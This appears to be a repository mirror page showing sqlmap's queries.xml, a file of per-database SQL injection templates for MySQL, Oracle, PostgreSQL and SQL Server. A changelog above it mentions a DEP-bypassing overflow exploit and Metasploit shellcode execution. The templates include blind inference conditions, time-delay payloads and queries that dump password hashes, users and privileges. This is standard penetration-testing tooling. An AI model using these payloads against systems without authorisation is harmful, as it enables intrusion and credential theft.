mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 19:13:48 +03:00
89c43893d4
Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
224 lines
17 KiB
XML
224 lines
17 KiB
XML
<?xml version="1.0" encoding="UTF-8"?>
|
|
|
|
<root>
|
|
<!-- MySQL -->
|
|
<dbms value="MySQL">
|
|
<cast query="CAST(%s AS CHAR(10000))"/>
|
|
<length query="LENGTH(%s)"/>
|
|
<isnull query="IFNULL(%s, ' ')"/>
|
|
<delimiter query=","/>
|
|
<limit query="LIMIT %d, %d"/>
|
|
<limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)"/>
|
|
<limitgroupstart query="1"/>
|
|
<limitgroupstop query="2"/>
|
|
<limitstring query=" LIMIT "/>
|
|
<order query="ORDER BY %s ASC"/>
|
|
<count query="COUNT(%s)"/>
|
|
<comment query="#" query2="/*"/>
|
|
<!--
|
|
NOTE: MySQL 5.0.12 introduced SLEEP() function
|
|
References:
|
|
* http://dev.mysql.com/doc/refman/5.0/en/news-5-0-12.html
|
|
* http://dev.mysql.com/doc/refman/5.1/en/miscellaneous-functions.html#function_sleep
|
|
-->
|
|
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
|
|
<substring query="MID((%s), %d, %d)"/>
|
|
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
|
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
|
|
<banner query="VERSION()"/>
|
|
<current_user query="CURRENT_USER()"/>
|
|
<current_db query="DATABASE()"/>
|
|
<is_dba query="(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y'"/>
|
|
<check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0, 1)='%s'"/>
|
|
<users>
|
|
<inband query="SELECT grantee FROM information_schema.USER_PRIVILEGES" query2="SELECT user FROM mysql.user"/>
|
|
<blind query="SELECT DISTINCT(grantee) FROM information_schema.USER_PRIVILEGES LIMIT %d, 1" query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d, 1" count="SELECT COUNT(DISTINCT(grantee)) FROM information_schema.USER_PRIVILEGES" count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user"/>
|
|
</users>
|
|
<passwords>
|
|
<inband query="SELECT user, password FROM mysql.user" condition="user"/>
|
|
<blind query="SELECT DISTINCT(password) FROM mysql.user WHERE user='%s' LIMIT %d, 1" count="SELECT COUNT(DISTINCT(password)) FROM mysql.user WHERE user='%s'"/>
|
|
</passwords>
|
|
<privileges>
|
|
<inband query="SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES" condition="grantee" query2="SELECT user, select_priv, insert_priv, update_priv, delete_priv, create_priv, drop_priv, reload_priv, shutdown_priv, process_priv, file_priv, grant_priv, references_priv, index_priv, alter_priv, show_db_priv, super_priv, create_tmp_table_priv, lock_tables_priv, execute_priv, repl_slave_priv, repl_client_priv, create_view_priv, show_view_priv, create_routine_priv, alter_routine_priv, create_user_priv FROM mysql.user" condition2="user"/>
|
|
<blind query="SELECT DISTINCT(privilege_type) FROM information_schema.USER_PRIVILEGES WHERE grantee%s%s LIMIT %d, 1" query2="SELECT select_priv, insert_priv, update_priv, delete_priv, create_priv, drop_priv, reload_priv, shutdown_priv, process_priv, file_priv, grant_priv, references_priv, index_priv, alter_priv, show_db_priv, super_priv, create_tmp_table_priv, lock_tables_priv, execute_priv, repl_slave_priv, repl_client_priv, create_view_priv, show_view_priv, create_routine_priv, alter_routine_priv, create_user_priv FROM mysql.user WHERE user='%s' LIMIT %d, 1" count="SELECT COUNT(DISTINCT(privilege_type)) FROM information_schema.USER_PRIVILEGES WHERE grantee%s%s" count2="SELECT COUNT(*) FROM mysql.user WHERE user='%s'"/>
|
|
</privileges>
|
|
<dbs>
|
|
<inband query="SELECT schema_name FROM information_schema.SCHEMATA" query2="SELECT db FROM mysql.db"/>
|
|
<blind query="SELECT DISTINCT(schema_name) FROM information_schema.SCHEMATA LIMIT %d, 1" query2="SELECT DISTINCT(db) FROM mysql.db LIMIT %d, 1" count="SELECT COUNT(DISTINCT(schema_name)) FROM information_schema.SCHEMATA" count2="SELECT COUNT(DISTINCT(db)) FROM mysql.db"/>
|
|
</dbs>
|
|
<tables>
|
|
<inband query="SELECT table_schema, table_name FROM information_schema.TABLES" condition="table_schema"/>
|
|
<blind query="SELECT table_name FROM information_schema.TABLES WHERE table_schema='%s' LIMIT %d, 1" count="SELECT COUNT(table_name) FROM information_schema.TABLES WHERE table_schema='%s'"/>
|
|
</tables>
|
|
<columns>
|
|
<inband query="SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'"/>
|
|
<blind query="SELECT column_name FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s' LIMIT %d, 1" query2="SELECT column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'"/>
|
|
</columns>
|
|
<dump_table>
|
|
<inband query="SELECT %s FROM %s.%s"/>
|
|
<blind query="SELECT %s FROM %s.%s LIMIT %d, 1" count="SELECT COUNT(*) FROM %s.%s"/>
|
|
</dump_table>
|
|
</dbms>
|
|
|
|
<!-- Oracle -->
|
|
<dbms value="Oracle">
|
|
<cast query="CAST(%s AS VARCHAR(4000))"/>
|
|
<length query="LENGTH(%s)"/>
|
|
<isnull query="NVL(%s, ' ')"/>
|
|
<delimiter query="||"/>
|
|
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
|
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
|
<limitgroupstart/>
|
|
<limitgroupstop/>
|
|
<limitstring/>
|
|
<order query="ORDER BY %s ASC"/>
|
|
<count query="COUNT(%s)"/>
|
|
<comment query="--"/>
|
|
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/>
|
|
<substring query="SUBSTR((%s), %d, %d)"/>
|
|
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
|
|
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
|
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
|
|
<current_user query="SELECT SYS.LOGIN_USER FROM DUAL"/>
|
|
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
|
|
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER AND GRANTED_ROLE='DBA')='DBA'"/>
|
|
<users>
|
|
<inband query="SELECT USERNAME FROM SYS.ALL_USERS"/>
|
|
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
|
|
</users>
|
|
<passwords>
|
|
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
|
|
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
|
|
</passwords>
|
|
<privileges>
|
|
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" condition="GRANTEE"/>
|
|
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'"/>
|
|
</privileges>
|
|
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
|
|
<dbs/>
|
|
<tables>
|
|
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
|
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
|
|
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
|
|
</tables>
|
|
<columns>
|
|
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"/>
|
|
<blind query="SELECT COLUMN_NAME FROM (SELECT COLUMN_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s') WHERE LIMIT=%d" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"/>
|
|
</columns>
|
|
<dump_table>
|
|
<inband query="SELECT %s FROM %s"/>
|
|
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
|
</dump_table>
|
|
</dbms>
|
|
|
|
<!-- PostgreSQL -->
|
|
<dbms value="PostgreSQL">
|
|
<cast query="CAST(%s AS CHARACTER(10000))"/>
|
|
<length query="LENGTH(%s)"/>
|
|
<isnull query="COALESCE(%s, ' ')"/>
|
|
<delimiter query="||"/>
|
|
<limit query="OFFSET %d LIMIT %d"/>
|
|
<limitregexp query="\s+OFFSET\s+([\d]+)\s+LIMIT\s+([\d]+)"/>
|
|
<limitgroupstart query="1"/>
|
|
<limitgroupstop query="2"/>
|
|
<limitstring query=" OFFSET "/>
|
|
<order query="ORDER BY %s ASC"/>
|
|
<count query="COUNT(%s)"/>
|
|
<comment query="--" query2="/*"/>
|
|
<!--
|
|
NOTE: PostgreSQL 8.2 introduced PG_SLEEP() function
|
|
References:
|
|
* http://www.postgresql.org/docs/8.3/interactive/release-8-2.html
|
|
* http://www.postgresql.org/docs/8.3/interactive/functions-datetime.html#FUNCTIONS-DATETIME-DELAY
|
|
-->
|
|
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 3000000))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
|
|
<substring query="SUBSTR((%s)::text, %d, %d)"/>
|
|
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
|
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
|
|
<banner query="VERSION()"/>
|
|
<current_user query="CURRENT_USER"/>
|
|
<current_db query="CURRENT_DATABASE()"/>
|
|
<is_dba query="(SELECT usesuper=true FROM pg_user WHERE usename=CURRENT_USER OFFSET 0 LIMIT 1)"/>
|
|
<check_udf query="(SELECT proname='%s' FROM pg_proc WHERE proname='%s' OFFSET 0 LIMIT 1)"/>
|
|
<users>
|
|
<inband query="SELECT usename FROM pg_user"/>
|
|
<blind query="SELECT DISTINCT(usename) FROM pg_user OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(usename)) FROM pg_user"/>
|
|
</users>
|
|
<passwords>
|
|
<inband query="SELECT usename, passwd FROM pg_shadow" condition="usename"/>
|
|
<blind query="SELECT DISTINCT(passwd) FROM pg_shadow WHERE usename='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(passwd)) FROM pg_shadow WHERE usename='%s'"/>
|
|
</passwords>
|
|
<privileges>
|
|
<inband query="SELECT usename, (CASE WHEN usecreatedb THEN 1 ELSE 0 END), (CASE WHEN usesuper THEN 1 ELSE 0 END), (CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user" condition="usename"/>
|
|
<blind query="SELECT (CASE WHEN usecreatedb THEN 1 ELSE 0 END), (CASE WHEN usesuper THEN 1 ELSE 0 END), (CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user WHERE usename='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(usename)) FROM pg_user WHERE usename='%s'"/>
|
|
</privileges>
|
|
<dbs>
|
|
<inband query="SELECT datname FROM pg_database"/>
|
|
<blind query="SELECT DISTINCT(datname) FROM pg_database OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(datname)) FROM pg_database"/>
|
|
</dbs>
|
|
<tables>
|
|
<inband query="SELECT schemaname, tablename FROM pg_tables" condition="schemaname"/>
|
|
<blind query="SELECT tablename FROM pg_tables WHERE schemaname='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(tablename) FROM pg_tables WHERE schemaname='%s'"/>
|
|
</tables>
|
|
<columns>
|
|
<inband query="SELECT attname, typname FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'"/>
|
|
<blind query="SELECT attname FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s' OFFSET %d LIMIT 1" query2="SELECT typname FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relname='%s' AND a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND attname='%s' AND nspname='%s'" count="SELECT COUNT(attname) FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'"/>
|
|
</columns>
|
|
<dump_table>
|
|
<inband query="SELECT %s FROM %s.%s"/>
|
|
<blind query="SELECT %s FROM %s.%s OFFSET %d LIMIT 1" count="SELECT COUNT(*) FROM %s.%s"/>
|
|
</dump_table>
|
|
</dbms>
|
|
|
|
<!-- Microsoft SQL Server -->
|
|
<dbms value="Microsoft SQL Server">
|
|
<cast query="CAST(%s AS VARCHAR(8000))"/>
|
|
<length query="LTRIM(STR(LEN(%s)))"/>
|
|
<isnull query="ISNULL(%s, ' ')"/>
|
|
<delimiter query="+"/>
|
|
<limit query="SELECT TOP %d "/>
|
|
<limitregexp query="TOP\s+([\d]+)\s+.+?\s+FROM\s+.+?\s+WHERE\s+.+?\s+NOT\s+IN\s+\(SELECT\s+TOP\s+([\d]+)\s+"/>
|
|
<limitgroupstart query="2"/>
|
|
<limitgroupstop query="1"/>
|
|
<limitstring/>
|
|
<order query="ORDER BY %s ASC"/>
|
|
<count query="COUNT(%s)"/>
|
|
<comment query="--" query2="/*"/>
|
|
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
|
<substring query="SUBSTRING((%s), %d, %d)"/>
|
|
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
|
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
|
<banner query="@@VERSION"/>
|
|
<current_user query="SYSTEM_USER"/>
|
|
<current_db query="DB_NAME()"/>
|
|
<is_dba query="IS_SRVROLEMEMBER('sysadmin')=1"/>
|
|
<users>
|
|
<inband query="SELECT name FROM master..syslogins" query2="SELECT name FROM sys.sql_logins"/>
|
|
<blind query="SELECT TOP 1 name FROM master..syslogins WHERE name NOT IN (SELECT TOP %d name FROM master..syslogins)" query2="SELECT TOP 1 name FROM sys.sql_logins WHERE name NOT IN (SELECT TOP %d name FROM sys.sql_logins)" count="SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins" count2="SELECT LTRIM(STR(COUNT(name))) FROM sys.sql_logins"/>
|
|
</users>
|
|
<passwords>
|
|
<inband query="SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins" query2="SELECT name, master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins" condition="name"/>
|
|
<blind query="SELECT TOP 1 master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM master..sysxlogins WHERE name='%s')" query2="SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM sys.sql_logins WHERE name='%s')" count="SELECT LTRIM(STR(COUNT(password))) FROM master..sysxlogins WHERE name='%s'" count2="SELECT LTRIM(STR(COUNT(password_hash))) FROM sys.sql_logins WHERE name='%s'"/>
|
|
</passwords>
|
|
<!-- NOTE: in Microsoft SQL Server there is no query to enumerate DBMS users privileges -->
|
|
<privileges/>
|
|
<dbs>
|
|
<inband query="SELECT name FROM master..sysdatabases"/>
|
|
<blind query="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases ORDER BY name) ORDER BY name" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
|
|
</dbs>
|
|
<tables>
|
|
<inband query="SELECT name FROM %s..sysobjects WHERE xtype IN ('u', 'v')"/>
|
|
<blind query="SELECT TOP 1 name FROM %s..sysobjects WHERE xtype IN ('u', 'v') AND name NOT IN (SELECT TOP %d name FROM %s..sysobjects WHERE xtype IN ('u', 'v') ORDER BY name ASC) ORDER BY name ASC" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE xtype IN ('u', 'v')"/>
|
|
</tables>
|
|
<columns>
|
|
<inband query="SELECT %s..syscolumns.name, TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'"/>
|
|
<blind query="SELECT TOP 1 name FROM (SELECT TOP %s name FROM %s..syscolumns WHERE id=(SELECT id FROM %s..sysobjects WHERE name='%s') ORDER BY name ASC) CTABLE ORDER BY name DESC" query2="SELECT TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.name='%s' AND %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..syscolumns WHERE id=(SELECT id FROM %s..sysobjects WHERE name='%s')"/>
|
|
</columns>
|
|
<dump_table>
|
|
<inband query="SELECT %s FROM %s..%s"/>
|
|
<blind query="SELECT TOP 1 %s FROM %s..%s WHERE %s NOT IN (SELECT TOP %d %s FROM %s..%s)" count="SELECT LTRIM(STR(COUNT(*))) FROM %s..%s"/>
|
|
</dump_table>
|
|
</dbms>
|
|
|
|
</root>
|